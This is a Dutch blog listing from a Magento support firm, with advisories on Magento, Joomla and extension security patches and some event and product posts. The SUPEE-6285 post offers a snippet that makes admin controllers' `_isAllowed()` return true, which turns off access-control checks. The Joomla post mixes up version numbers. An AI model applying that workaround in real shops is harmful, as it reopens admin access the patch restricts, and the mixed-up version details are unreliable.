    • Reflected XSS in backend coupon entry - APPSEC-1305
      • CVSSv3 Severity: 0 (Low)
    • Injected code can be stored in database - APPSEC-1240
      • CVSSv3 Severity: 0 (Low)
    • Injected code can be stored in database - APPSEC-1240
      • CVSSv3 Severity: 0 (Low)

    Magento 1.9.2.3 update

    Magento adviseert om spoedig alles te update naar de laatste versie, Magento 1.9.2.3.
    Deze Magento security update heeft impact op de volgende onderdelen.

    • admin toegang
    • verwijderen of aanpassen van reviews
    • manupuleren van orders
    • orders van andere inzien
    • klantgegevens inzien
    • wachtwoord phishing
    • ongeoorloofde upload
    • denial of service (website offline brengen)
    • omzeilen van de CAPTCHA
    • producten uit winkelmand verwijderen


    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten zo spoedig mogelijk te patchen.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-6788 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Ontmoet SupportDesk tijdens de Webwinkel Vakdagen 2016

    Zullen we afspreken op de Webwinkel vakdagen?

    De Webwinkel vakdagen is uitgegroeid tot het belangrijkste event van de e-commerce branche in de Benelux. De 10 jubileum editie vindt plaats op woensdag 20 en donderdag 21 januari aanstaande, en SupportDesk is er bij!
    De lijst van exposanten is dit jaar ook weer erg indrukwekkend. Het bezoekers aantal wat verwacht word is rond de 11.000.

    Heb je vragen over je Magento webshop? En wil je er met een van onze SupportDesk medewerkers over kletsen, kom dan even langs op de stand van CoScale (stand L22). Elk uur kan Magento Doctor Ray Bogman je helpen met allerlei Magento gerelateerde zaken.

    Plan hier je afspraak in.

    Eventbrite - Verbeter je Magento Performance met Magento Doctor Ray Bogman
    Magento Doctor WWVD 2016

     

    Business Metrics voor Iedereen

    Ben je dagelijks bezig met het managen van een Magento shop, ongeacht of je webwinkeleigenaar bent, webmaster of onwikkelaar bent. En wil je op de hoogte zijn van je actueele kwaliteit van je Magento shop. Werkt je server of caching wel goed, hoeveel orders heb ik vandaag op desktop en/of mobile.

    Ray Bogman zal tijdens de webwinkelvakdagen een presentatie geven over managen en inzicht krijgen van al je belangrijk business metrics in Magento. Meer weten over de presentatie klik hier! Reserveer op tijd een stoel, afgelopen jaren waren de stoelen snel gevuld.

    Magento 2 Ready?

    Ben je geinteresseerd om je Magento shop te migreren naar Magento 2? En zijn de meest gebruikte modules in jouw webshop wel Magento 2 ready? Schroom niet, en kom langs bij standnummer L22 (bij onze partner Coscale)

    meer info   of   

    Bel nu! 020 337 5961

    Rachel Tjong-A-HungDit artikel is geschreven door Rachel Tjong-A-Hung, onze spin in het web als support/ticket Manager.

     

  • Voorkom daling in SEO, activeer full SSL nu!

    ssl-lockGoogle is al een tijd bezig met het promoten van veilig surfen. Eén van de punten om bezoekers veiliger te laten surfen is het aanbieden van uw site(s) over een beveiligde HTTPS verbinding (ook wel SSL verbinding genoemd). De gegevens die van de bezoeker naar de site gestuurd worden, zullen dan via een encryptie verstuurd worden. Denk hierbij aan formulieren, zoals de checkout met email- en adresgegevens, maar ook contact-, account- en inlogformulieren. Met een SSL verbinding is het niet meer mogelijk om de verstuurde gegevens te onderscheppen. Onderschepping van gegevens kan gebeuren doordat de pc waarmee gesurfd wordt niet veilig is en besmet is met virussen e.d. Door de site aan te bieden via een SSL verbinding, maakt u het bezoeken van uw site veilig voor uw klanten en bezoekers. 

    Nu gaat Google nog een stap verder en heeft 17 december jl. aangekondigd dat onveilige sites lager gerankt zullen worden dan sites die wel aangeboden worden over de beveiligde SSL verbinding. 

    Wat betekent dit voor u?

    Als uw site al volledig via een HTTPS verbinding draait, dan hoeft u NIETS te doen. Alles is al voor elkaar (eventuele hardening kan nog geweest zijn aangezien een default SSL implementatie niet altijd voorzien in de juiste configuratie).

    Als uw site NIET of deels via een HTTPS verbinding draait, dan is verstandig om dit WEL te gaan regelen, voordat uw ranking daalt en u minder bezoek krijgt dan u gewend bent.

    Plan van aanpak SSL optimalisatie

    1. SSL Certificaat aanschaffen

      Voordat u deze gaat aanschaffen is het belangrijk om te weten wat voor certificaat u nodig heeft en hoe ver u wilt gaan in de encryptie. Ook uw server configuratie en het aantal domeinen dat u in gebruik heeft, zijn belangrijk in het traject van het kiezen van het juiste certificaat. Voor het genereren van de RSA key die nodig is bij het aanvragen van een SSL certificaat kan technische kennis nodig zijn. 

    2. SSL Certificaat op de server (laten) installeren

      Na de aanschaf van het SSL certificaat krijgt u het certificaat waarschijnlijk per e-mail toegestuurd. Deze zal dan vervolgens op de server geinstalleerd moeten worden via het controle panel of rechtstreeks op de server. 

    3. De site geheel over SSL laten lopen

      Hiervoor moeten een aantal configuraties aangepast worden en moeten diverse functionaliteit nagelopen worden zoals robots.txt, sitemap en canonical urls etc.

    4. De site nalopen op onveilige onderdelen in de content

      Als de site over SSL draait kan het gebeuren dat er een melding 'onveilig' naar boven komt en het beruchte 'slotje' niet getoond wordt. Dit wordt veroorzaakt door bijv een afbeelding die wordt geladen via een http link ipv https. Het is van belang dat alle onderdelen (images, css, js etc) op de pagina zelf ook via de https verbinding geladen wordt. 

    5. De server snelheid monitoren

      Een SSL encryptie kan impact hebben op de snelheid van uw website. Dit wordt veroorzaakt doordat bij encryptie letterlijk meer bytes heen en weer gestuurd zullen worden. Heeft u al een snelle server, dan zal het verschil minimaal zijn. Heeft u al performance uitdagingen, dan kan dit net een druppel te veel zijn en zal ook de performance onder handen genomen moeten worden.

    6. SSL hardening

      SSL tuning of harding is een extra optimalisatie opties om kwaadwillende buiten te houden. Middels de tuning is het namelijk mogelijk op server nivo de website zo in te stellen dat er geen injecties van bestanden of domein meer mogelijk zijn. Mede dankzij deze tuning zal Google de kwaliteit van de website beter rankeren aangezien er een SSL kwaliteits rankering wordt bij gehouden.
    Zie hier een voorbeeld van een slechte en correct geinstalleerde SSL setup.

    ssl-tuning-before

     ssl-tuning-after

    Om uw ranking in stand te houden en de bezoekersstroom op gang te houden, raden wij u aan dit snel op te pakken. Heeft u hierbij hulp nodig? 

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.
    meer info   of   

    Bel nu! 020 337 5961

    Jikke BroxtermanDit artikel is geschreven door Jikke Broxterman van SupportDesk, zij vervult haar rol als Senior Specialist.

    Google+ | LinkedIn

  • Magento Security Update SUPEE-6788

    securityrelease

    Onlangs zijn er 10 veiligheidslekken in Magento ontdekt en opgelost in een patch SUPEE-6788. De lekken zijn aanwezig in alle versies van Magento t/m 1.9/x, dus zowel Magento Community als Magento Enterprise shops hebben hiermee te maken. Officieel zijn er enkel patches beschikbaar vanaf 1.7 en hoger, maar het betreft hier een issue dat impact heeft op alle versies.  

    Wat zijn de 10 lekken van SUPEE-6788?

    • Cross-site Scripting Using Unvalidated Headers
      • CVSSv3 Severity: 9.3 (Critical)
    • Error Reporting in Setup Exposes Configuration
      • CVSSv3 Severity: 7.5 (High)
    • Filter Directives Can Allow Access to Protected Data
      • CVSSv3 Severity: 7.5 (High)
    • XXE/XEE Attack on Zend XML Functionality Using Multibyte Payloads
      • CVSSv3 Severity: 7.5 (High)
    • Potential SQL Injection in Magento Core Model Base Classes
      • CVSSv3 Severity: 7.4 (High)
    • Potential Remote Code Execution Using Cron
      • CVSSv3 Severity: 7.2 (High)
    • Remote Code Execution / Information Leak Using File Custom Option
      • CVSSv3 Severity: 6.5 (Medium)
    • Cross-site Scripting with Error Messages
      • CVSSv3 Severity: 6.1 (Medium)
    • Potential Remote Code Execution Using Error Reports and Downloadable Products
      • CVSSv3 Severity: 3.6 (Low)
    • Dev Folder Not Protected
      • CVSSv3 Severity: 0 (None)
    Important! This patch breaks backward compatibility, and can impact extensions and customizations.

    Magento 1.9.2.2 update

    Magento adviseert om spoedig alles te update naar de laatste versie, Magento 1.9.2.2.
    De impact van deze patch zorgt er voor dat alle geinstalleerde modules niet meer kunnen werken na het installeren van de SUPEE-6788 patch. In de nieuwe Magento 1.9.2.2 is een nieuwe beveiligings toepassing beschikbaar welke modules via de backend beter beveiligd tegen misbruik. 

    Veelal hebben de meeste modules deze beveiligings optie nog niet en is het dus noodzaak om alle modules te updaten. Dit kan misbruik van je Magento webshop voorkomen.

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten zo spoedig mogelijk te patchen.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-6788 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Business Metrics 4 everyone!

    Working with Magento on a daily basis as a shop owner, webmaster or developer is standard practice. But do you ever monitor Magento on a daily or hourly basis?

    Do you know what’s going on in your shop, and how customers like the shopping experience? Do you get triggered when something is wrong? Did someone clear the cache? If so, when? Is Redis having issues? Have new CMS pages been created? What is the load time for your users? Why is CPU/MEM that high? And is there a relation between all of this?

    All of these things are happening on a real time basis right now. Get in control of your own shop and manage IT!

    During Meet Magento Switserland Ray Bogman presented a business case from a well-known Magento shop in the Netherlands (www.condoom-anoniem.nl), and explain how the shop owner monitors what is happening in his shop in real time.

    Click here for the slides of the Meet Magento Zwitserland session "Business Metrics 4 everyone!"

    Magento monitoring by CoScale

    The monitoring solution form CoScale is a collaboration between SupportDesk and CoScale. The Magento module is available in the Magento Connect store and can be easily installed in every single or multi Magento environment.

    Overview of some of the benefits:

    • Easy integration in Magento.
    • Multi store compatibility.
    • Realtime user monitoring (incl user experience insights).
    • SIngle or multi server compatibility.
    • Business, Application and Server metics in a single SaaS solution.
    • Apache, Nginx, MySql, Redis, Varnish, Elastic etc... monitoring.
    • 3rd Party integrations with Google Analytics, Mailchimp etc... (or our API for custom metrics).
    • Easy overview of your top10 most viewed pages or top10 worst viewed pages ((per storeview).
    • Create easy multiple dashboards on the fly (every Merchant, Developer or DevOps can have there own dashboard).

    Screenshots dashboard

    coscale-merchant-dashboard

    coscale-merchant-dashboard-multi

    coscale-developer-dashboard

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Joomla Security Update 3.4.5

    securityreleaseVandaag heeft het Joomla! Project een zeer belangrijke security upgrade uitgebracht, namelijk Joomla! 3.2.3. Het betreft hier een Joomla Security release. Het betreffen hier 3 Joomla Security (high en Medium security) issues. Heb je een Joomla! 3.4.x versie, dan raden wij aan zo SPOEDIG mogelijk te updaten.

    Joomla! 3.4.5

    Joomla! 3.4.5. bevat een aantal nieuwe handige features. Waaronder:

    • High Priority - Core - SQL Injection (affecting Joomla 3.2 through 3.4.4) 
    • Medium Priority - Core - ACL Violations (affecting Joomla 3.2 through 3.4.4) 
    • Medium Priority - Core - ACL Violations (affecting Joomla 3.0 through 3.4.4

    Meer informatie over deze release vind je op de website van Joomla!.

    Omdat dit een security release is, raden we onze klanten sterk aan direct te upgraden!

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Top 10 Magento Extension 2015
    mug-top-10-magento-extension-2015

    Magento User Group Amsterdam

    Afgelopen donderdag 27 Augustus heeft de Magento User Group Amsterdam voor de 4 keer een Top 10 verkiezing gedaan van de beste Magento Extentions van dit moment.

    De samenstelling van de modules kon vooraf worden ingediend en is aangevuld door de aanwezige MUG-ers. Dankzij de vele inzendingen was de keuze enorm met jaar verrassend veel module van een en de zelfde bouwer. Blijkbaar vallen deze goed in de smaak bij onze Magento winkel eigenaren en ontwikkelaars.

    Omdat we dit jaar zoveel inzendingen hebben ontvangen zijn deze onderverdeeld in 7 categorieen om elke extenties een goede kans te geven om te winnen.
    De 7 categorieen zijn:

    MUG Magento extention top10 2015Magento Backend Extensions

    Magento Frontend/Theming Extensions

    MUG Magento extention top10 2015Magento Marketing Extensions

    Worst Magento Extentions

    • Alle aziatische extensions 
    • Maatwerk uit India
    • Alle atoic extensions
    • Adyen Payment
    • Netresearch Ingenico (Ogone)
    • WebTex - Customer Prices
    • Slechte Reponsive Design themes (slecht voor performance)
    • Magento ColorSwatch 1.9.x
    • Onnodige Magento modules: modules die aan staan maar niet gebruikt worden, vertragen de shop. Tip: zet de modules uit.

    Dev Tools

    Sinds de Top 10 sessie van 2014 ontstond er een nieuwe categorie genaamd “Dev tools”. De meest populaire dev tool is N-98. Je kunt N-98 beschouwen als het Zwitsers zakmes van Magento. Je kunt er legio dingen mee configureren, zoals database sychroniseren, gebruikers aanmaken enz. Voor deze tool is kennis van Shell wel vereist en het voor een eerste gebruik aan te raden om eerst op een testomgeving te werken met N-98.

    Magento Security Extensions

    magento performance extensionsMagento Performance Extensions

  • Rapido Image Optimization [Rapido]
  • Lesti::FPC [Gordon Lesti]
  • Nexess turpentine [Nexess]
  • Fast asynchronous-reindexasynchronous-reindex [Mirasvit]
  • Byte Top 20 Magento Extension

    Naast de Magento Extension aangeleverd door winkel eigenaren en ontwikkelaar was het dit jaar ook tijd om de proef op de som te nemen en te kijken welke Magento Extension nu geinstalleerd zijn op het hosting platform van Byte. Leuk is te zien dat diverse Magento Extension welke hierboven staan nu ook terug komen in de lijst van de overige klant bij Byte.

    Zo zien we oa. Lesti FPC, Fooman PdfCustomiser en OneStepCheckout al in de Top 10 terug komen.

    Byte Top 20 Magento Extension
    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento New Relic Workshop a success!

    Magento New Relic Workshop Amsterdam great success!

    The Magento New Relic workshop on the 25th of June was hosted at our HQ in Amsterdam in coorporation with Byte.

    Our very own Melvyn Sopacua was the main speaker for this year's New Relic workshop. Many excited technical and non-technical Magento Lovers crammed into the meeting room, ready to gain more knowledge of New Relic.

    New Relic Workshop Byte

    During the New Relic workshop, topics like "main uses for developers and maintainers", "bottlenecks", "how to reproduce a problem" and many more were discussed.
    You can find the sheets online, if you want to refresh your memory or just to get a brief insight of New Relic.

    New Relic Goodies

    New Relic heard about the workshop we were giving and send us some goodies. We handed them out at the end of the workshop to the participants for being such troopers. Many thanx New Relic !!!

    New Relic Goodies

     

     

    Interested in New Relic with Magento?

    If you are interested in implementing New Relic feel free to contact us or apply for an account directly via New Relic.

    meer info   of   

    Bel nu! 020 337 5961

    Rachel Tjong-A-HungDit artikel is geschreven door Rachel Tjong-A-Hung, onze spin in het web als support/ticket Manager.

  • Update: Critical SUPEE-6285 Patch

    securityrelease

    Het uitvoeren van de SUPEE-6285 Patch of updaten naar Magento 1.9.2.0 (waar deze patches ook in verwerkt zijn) is duidelijk gebleken dat dit geen 'stroll in the park' is.

    Developers wereldwijd hebben massaal de patches door zitten voeren of een update gedaan van een Magento shop naar 1.9.2.0
    Hieruit zijn een aantal errors boven water gekomen.

    Wat kan ik doen bij 'Access Denied'?

    Na de update  of installatie van de patch is het mogelijk dat sommige custom extensies/modules niet meer zullen werken. Een reden hiervoor kan zijn dat de default 'return value' van Mage_Adminhtml_Controller_Action::_isAllowed()  gewijzigd is van true naar Mage::getSingleton('admin/session')->isAllowed('admin').  Extensies die deze methode niet overschrijven in hun admin controllers, wellicht omdat ze geen gebruik maken van de ACL, hebben nu de toestemming "ALL" nodig.

    Een snelle oplossing hiervoor is om een wijziging door te voeren in de admin controllers van al deze extensies :

    protected function _isAllowed() { return true; }

    Tevens is het mogelijk alle modules in een keer te patchen middels deze SupportDesk SUPEE-6285 FixAcl fix

    Kom je er zelf niet uit?

    Wij helpen u graag hiermee. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-6285 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Exact meets Magento: the next level

    Exact meets Magento

    "Na vele geslaagde edities is het event Exact meets Magento een gevestigde naam binnen de e-commercewereld. Dealer4Dealer organiseert in samenwerking met Exact op donderdag 17 september wederom een Exact meets Magento editie."

    Dit jaar staat Exact meets Magento in het teken van 'the next level of e-commerce'.

    Natuurlijk moet je met veel meer aspecten rekening houden, wil je aan de top van e-commerceland staan. Denk bijvoorbeeld aan het grip krijgen op SEO, de B2B-markt die een steeds grotere rol gaat spelen, de optimalisatie van marketing en Social Media-gebruik en kassasystemen die steeds beter geïntegreerd dienen te worden. Al met al genoeg aspecten die grote vragen kunnen opwekken. In een middag tijdens 9 BreakOut-sessie,zullen professionals je klaarstomen voor de toekomst. Ook al jouw vragen zullen tijdens deze sessie beantwoord worden. Deze sessie is gratis voor de eerste 100 aanmeldingen. Daarna zal een ticket €35,- kosten. Meld je vandaag hier nog aan.

    Magento 2.0 Updatesessie

    Volgens het aanmeldformulier van het Exact meets Magento evenement is de Magento 2.0 updatesessie inmiddels volgeboekt. Je kunt je nog aanmelden voor de sessie, maar in dat geval wordt je op de reservelijst geplaatst.

    SupportDesk zelf zal ook een sessie hierover geven, mits er genoeg aanmeldingen zijn. Indien je hierbij aanwezig wilt zijn, meld je dan aan via dit formulier voor de SupportDesk Magento 2.0 Updatesessie.

    Ray Bogman zal een van de keynote speakers zijn op de Exact meets Magento editie. Hij zal je een update geven over Magento 2.0

    Inmiddels zijn er een tal van aanmeldingen binnengestroomt, en zijn er voor de sessie van Ray nog een paar plekken over.

    Geen plek meer of wil je de sessie Magento 2.0 van Ray nogmaals meemaken? Meld je dan via dit formulier aan voor een aparte sessie bij SupportDesk.
    Bij genoeg aanmeldingen zullen wij een datum prikken voor een tweede sessie.

    meer info   of   

    Bel nu! 020 337 5961

    Rachel Tjong-A-HungDit artikel is geschreven door Rachel Tjong-A-Hung, onze spin in het web als support/ticket Manager.

  • Magento Security Update SUPEE-6482 Patch Bundle

    securityrelease

    Onlangs zijn er 4 veiligheidslekken in Magento ontdekt en opgelost in een patch SUPEE-6482. De lekken zijn aanwezig in alle versies van Magento (1.4/x - 1.9/x), dus zowel Magento Community als Magento Enterprise shops hebben hiermee te maken. Officieel zijn er alleen patches beschikbaar vanaf 1.4 en hoger, maar Magento geeft aan dat het hier om alle versies gaat.  

    Wat zijn de 4 lekken van SUPEE-6482?

    • Cross-site Scripting/Cache Poisoning [Magento Enterprise only]

      •  Mogelijkheid tot het vergaren van oa. credit card informatie middel een aangepaste host header icm aangepast HTML en Javascript code.

      • CVSS Severity: 9.3 (Critical)

    • Autoloaded File Inclusion in Magento SOAP API
      •  Afhankelijk van de PHP en server configuratie is het mogelijk toegang te krijgen tot de data middels een API SOAP koppeling.

      • CVSS Severity: 6.5 (Medium)

    • XSS in Gift Registry Search [Magento Enterprise only]
      •  Mogelijkheid tot identiteitsdiefstal in de Gift Registry zoek optie door het aanpassen van de cookie.

      • CVSS Severity: 6.1 (Medium)

    • SSRF Vulnerability in WSDL File
      • Incorrecte encoding van de API wachtwoord gegevens.
      • CVSS Severity: 5.3 (Medium)

    Letop: 2 van de 4 issues zijn enkel Magento Enterprise only

    Magento 1.9.2.1 update

    Met de komst van de nieuwe magento security patches is er ook een nieuwe versie beschikbaar gekomen, namelijk Magento 1.9.2.1. Los van de patches zijn hier en daar ook de nodige bugs opgelost.

    De volgende onderdelen hebben een update gekregen: Locale, CMS, Static Blocks, Widgets, Compare en de cookie.phtml

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten met een Magento webshop de patches te installeren.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-6482 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Security Update SUPEE-6285 Patch Bundle

    securityrelease

    Onlangs zijn er 8 veiligheidslekken in Magento ontdekt en opgelost in een patch SUPEE-6285. De lekken zijn aanwezig in alle versies van Magento (1.6/x - 1.9/x), dus zowel Magento Community als Magento Enterprise shops hebben hiermee te maken. Officieel zijn er alleen patches beschikbaar vanaf 1.6 en hoger, maar Magento geeft aan dat het hier om alle versies gaat.  

    Wat zijn de 8 lekken van SUPEE-6285?

    • Customer Information Leak via RSS and Privilege Escalation

      • Onjuiste toegang tot klant gegevens zijn beschikbaar ( bestelinformatie , order -id , naam van de klant, etc...) middels het "Guest Order Review" systeem. Deze zelfde mogelijk is ook beschikbaar via de backend.

      • CVSS Severity: 7.5 (high)

    • Request Forgery in Magento Connect Leads to Code Execution
      • Een Cross-Site Request Forgery (CSRF) in de Magento Connect Manager kan een aanval uitvoeren tijdens de installatie van een externe module, en kan leiden tot het uitvoeren van onveilige externe code binnen je Magento omgeving. Een aanvaller kan middels een ingelogde shop eigenaar een speciale link via een ander medium gestuurd hebben om zo toegang te krijgen.

      • CVSS Severity: 9.3 (Critical)

    • Cross-site Scripting in Wishlist
      • Middels de Magento Whishlist is het mogelijk om spoofing en phishing e-mails te sturen.

      • CVSS Severity: 5.3 (Medium)

    • Cross-site Scripting in Cart
      • In de Magento shopping cart is het mogelijk middels een aangepaste URL parameter JavaScript code te injecteren. Cookie and andere informatie (klant gegevens) kan dan verzameld worden en doorgestuurd worden naar de aanvaller.
      • CVSS Severity: 6.1 (Medium)

    • Store Path Disclosure
      • Informantie van de gehoste Magento omgeving (server path) kan vergaard worden middels direct toegang tot een gerelateerd bestand van de Magento Connect installatie procedure.
      • CVSS Severity: 5.3 (Medium)

    • Permissions on Log Files too Broad
      • Log bestanden op de Magento omgeving beschikken momenteel over te veel rechten welke momenteel toegang geven aan andere gebruikers.
      • CVSS Severity: 3.8 (Low)

    • Cross-site Scripting in Admin
      • Een aanvaller kan JavaScript code injecteren in de titel van een Widget van de Magento Admin. De code kan later worden uitgevoerd wanneer een andere beheerder deze Widget opent. De aanvaller moet toegang tot de winkel te hebben om deze te kunnen uitvoeren. Echter, wanneer deze code uitgevoerd is, kan de aanvaller alle account overnemen.

      • CVSS Severity: 6.5 (Medium)

    • Cross-site Scripting in Orders RSS
      • MIddels de Magento RSS order optie is het mogelijk om onveilige data te injecteren.
      • CVSS Severity: 5.3 (Medium)

    • Update 09-07-2015 : Bij het installeren van de Magento patch is het mogelijk dat er een 'Access Denied' verschijnt. Dit houdt in dat de externe modules individueel geupdate of gepatched moeten worden.
      Er is een nieuwe versie van de patch voor Magento 1.9 beschikbaar gesteld die de problemen met het RWD theme oplost.

      Wat moet ik doen om Magento Security issues te bestrijden?

      Wij raden onze klanten met een Magento webshop de patches te installeren.

      Letop: deze patches hebben impact op oa. Apache en Nginx aangezien er een custom aanpassing in de .htaccess file of Nginx config nodig is. 

      Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

      Via de Magento download website is het mogelijk de Magento security patch SUPEE-6285 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

      meer info   of   

      Bel nu! 020 337 5961

      Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

      Google+ | LinkedIn | Twitter

  • Magento Live UK 2015

    Magento Live UK 2015

    Magento Security Essentials Seminar

    Ray Bogman will be one of the guest speakers at Magento Live UK 2015.

    In this seminar the speakers will discuss how making your eCommerce website secure should be your #1 priority. A group of industry experts will explore Magento security from the perspective of a merchant, developer, and hacker.
    You will learn about the security essentials for daily store operations as well as long term security objectives.

    Speakers:

    • Ray Bogman, CTO, SupportDesk
    • Bastian Ike, Magento Developer, AOE GmbH
    • Anna Völkl, Senior Magento Developer, LimeSoda

    Sneak Preview

    Here's a little sneak preview of the topics to be discussed by Ray:

    • Security is Easy & Fun (Think like a script kiddie)
    • Security, a daily routine (a daily mindset)
    • Security as a Rockstar  (On tour 2014-2015)

    The video this seminar will be available for the rest of the world to see at the end of next week. We'll be sure to keep you posted!

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Fooman Pdf Customiser - Important Security Update

    De Fooman Pdf Customiser gebruikt de TCPDF Library om pdf's te genereren. Er is een lek ontdekt in de versie die gebruikt wordt bij de Pdf Customiser (Fooman v.2.1.11+).securityrelease

    Wat moet ik doen?

    Hoewel er nog geen meldingen binnen zijn gekomen vanuit de gebruikers, wordt er wel aangeraden deze module te updaten. Bij de update komt ook de laatste versie van TCPDF Library bij met de security update.
     
    Wij raden onze klanten dan ook aan om vandaag nog de extensie te updaten. Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Critical Security Flaw in Magento Blog Extension (aw_blog)

    securityreleaseDe AheadWorks Blog (aw_blog) extensie voor Magento (voorafgaand van versie 1.3.10) is kwetsbaar voor een kritische SQL Injection security fout. Een remote niet geverifieerde aanvaller zou deze kwetsbaarheid kunnen misbruiken. Dit kan betekenen dat hij volledige controle zou kunnen hebben over de desbetreffende Magento server en database.

    Wat moet ik doen?

    Deze fout is doorgegeven aan aheadWorks op de 22 April 2015. Een fix is vrijgegeven op 27 April 2015.

    Wij raden onze klanten met een Magento webshop en gebruikmaken van de Aheadworks Blog extensie om vandaag nog de extensie te updaten. Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Meet Magento Awards Nominatie

    imgo

    Nominatie "Beste bijdrage Magento community"

    Met trots mogen wij mededelen dat onze eigen Ray Bogman genomineerd is voor de categorie "Beste bijdrage Magento community" bij de Meet Magento Awards 2015. 
    Ben je hier ook mee eens? Vergeet dan niet te stemmen op Ray via de Meet Magento Website!

    Win kaarten naar Meet Magento!

    In verband met het (bijna) driejarig bestaan van SupportDesk verloten wij 4 kaarten naar Meet Magento. Beantwoord onze prijsvraag en wie weet ben jij één van de gelukkige winnaars!
    Klik hier om de prijsvraag te beantwoorden en maak kans op één van de 4 kaarten.

    Success!

     

  • Magento Security Update SUPEE-5994 Patch Bundle

    securityrelease

    ShopHack

    Onlangs zijn er 7 veiligheidslekken in Magento ontdekt en opgelost in een patch SUPEE-5994. De lekken zijn aanwezig in alle versies van Magento (1.4/x - 1.9/x), dus zowel Magento Community als Magento Enterprise shops hebben hiermee te maken. Officieel zijn er alleen patches beschikbaar vanaf 1.4 en hoger, maar Magento geeft aan dat het hier om alle versies gaat.  

    Wat zijn de 7 lekken van ShopHack?

    • Admin Path Disclosure
      • Een aanvaller kan de Admin Login verzoeken rechtstreeks een module aan te roepen, ongeacht of deze voorkomen in de Admin URL. Dit maakt het makkelijker om het wachtwoord met behulp van brute force attacks te achterhalen.

    • Customer Address Leak through Checkout
      • Hiermee kan een aanvaller adresgegevens (naam, adres, telefoonnummer ) van de adresboeken van andere klanten verkrijgen.Tijdens het afrekenen, kan de aanvaller toegang tot een willekeurig adresboek krijgen door het invoeren van een sequentiële ID. Een functionele proof of concept bestaat reeds.

    • Customer Information Leak through Recurring Profile
      • Dit probleem maakt dhet mogelijk voor de aanvaller  om adres, vorige bestelling, betaalmethode en informatie van de terugkerende betaling profielen van andere klanten te verkrijgen. Een functionele proof of concept bestaat reeds.

    • Local File Path Disclosure Using Media Cache
      • De aanvaller kan fictieve image URL's gebruiken om de server gegevens bloot te leggen, ongeacht de instellingen.
    • Spreadsheet Formula Injection
      • De aanvaller kan input, die door een algoritme wordt uitgevoerd, exporteren en openen in een spreadsheetprogramma zoals Microsoft Excel. De formule kan oa. gegevens exporteren, persoonlijke gegevens wijzigen.
    • Cross-site Scripting Using Authorize.Net Direct Post Module
      • Hiermee kan een aanvaller JavaScript uit voeren in het kader van klantsessie. Als een klant dan op een schadelijke link klikt, kan de aanvaller cookies stelen en de sessie overnemen, die dan persoonlijke informatie blootsteld.
    • Malicious Package Can Overwrite System Files
      • Aanvaller kan een kwaadwillende module installeren en code overschrijven.

    Wat moet ik doen om ShopHack te bestrijden?

    Wij raden onze klanten met een Magento webshop de patches te installeren. Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-5994 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

